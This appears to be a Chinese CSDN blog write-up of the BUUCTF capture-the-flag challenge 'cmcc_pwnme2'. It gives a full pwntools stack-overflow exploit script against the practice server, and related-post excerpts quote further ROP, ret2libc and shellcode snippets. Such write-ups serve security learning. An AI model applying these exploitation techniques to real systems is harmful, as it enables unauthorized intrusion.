BUUCTF之“cmcc_pwnme2”做题简单记录

最新推荐文章于 2024-01-31 14:40:58 发布
原创 最新推荐文章于 2024-01-31 14:40:58 发布 · 2.7k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#pwn
本文介绍了一篇关于使用IDA分析函数名获取提示,并通过构造payload利用缓冲区溢出漏洞执行特定指令获取shell的过程。文章中提到了payload制作的细节,特别是注意sendline函数的使用方式,避免了程序错误。

这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就
是提示的信息。

from pwn import *

p = remote('node4.buuoj.cn',25488)
elf=ELF('./pwnme2')

exec_string=0x080485cb
string=0x0804a060
gets=elf.sym['gets']

p.recvuntil('Please input:\n')

payload=b'a'*(0x6c+4)+p32(gets)+p32(0x080485cb)+p32(0x0804a060)

p.sendline(payload)
p.sendline("flag")
p.interactive()

有个比较离谱的是倒数第二行,如果用“p.send(“flag”)”那就会报错。
具体细节看这位师傅

pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 2437
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
cmcc_pwnme2
m0_61948538的博客
02-01 299
栈溢出基础传参题
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 1283
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
[BUUCTF]-PWN:cmcc_pwnme2解析
2301_79326813的博客
01-31 412
保护ida。
pwnme2pwnme3的wp
一个码农的笔记
10-15 1591
这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习 pwnme2的下载地址是http://download.csdn.net/download/niexinming/10021147 题目要求:Task: 溢出,操控按顺序执行函数,读取到flag文件即可... 题目地址:nc 104.224.169.128 18887把pwnme2直接
cmcc pwnme2
pondzhang的专栏
12-25 419
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 810
buuctf pwn 第三页
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 879
buuctf wp
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 727
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1796
文章目录actf_2019_babystack actf_2019_babystack 栈迁移,注意ret对齐 没对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 457
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 901
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
BUUCTF刷题4
m0_51251108的博客
10-30 571
题目:hitcon2014_stkof:pwnable_hacknote:ciscn_2019_s_9:picoctf_2018_shellcode:npuctf_2020_easyheap:cmcc_pwnme2:x_ctf_b0verfl0w:picoctf_2018_leak_me:suctf_2018_basic pwncmcc_pwnme1: hitcon2014_stkof: 参考师傅:(4条消息) 好好说话之unlink_hollk’s blog-CSDN博客_好好说话之unlink 利用方
BUUCTF-pwn(10)
菜鸡的博客
01-08 488
picoctf_2018_shellcode 题目很很简单! from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './PicoCTF_2018_shellcode' r = remote('node4.buuoj.cn',25585) #r = process(binary) elf = ELF(binary) shellcode = asm(shellcraft.sh()) r.recvunti
PWN-PRACTICE-BUUCTF-19
P1umH0的博客
09-07 232
PWN-PRACTICE-BUUCTF-19hitcontraining_bambooboxpicoctf_2018_shellcodenpuctf_2020_easyheapcmcc_pwnme2 hitcontraining_bamboobox unlink,参考:hitcontraining_bamboobox 堆技巧 unlink # -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 1057
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 591
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值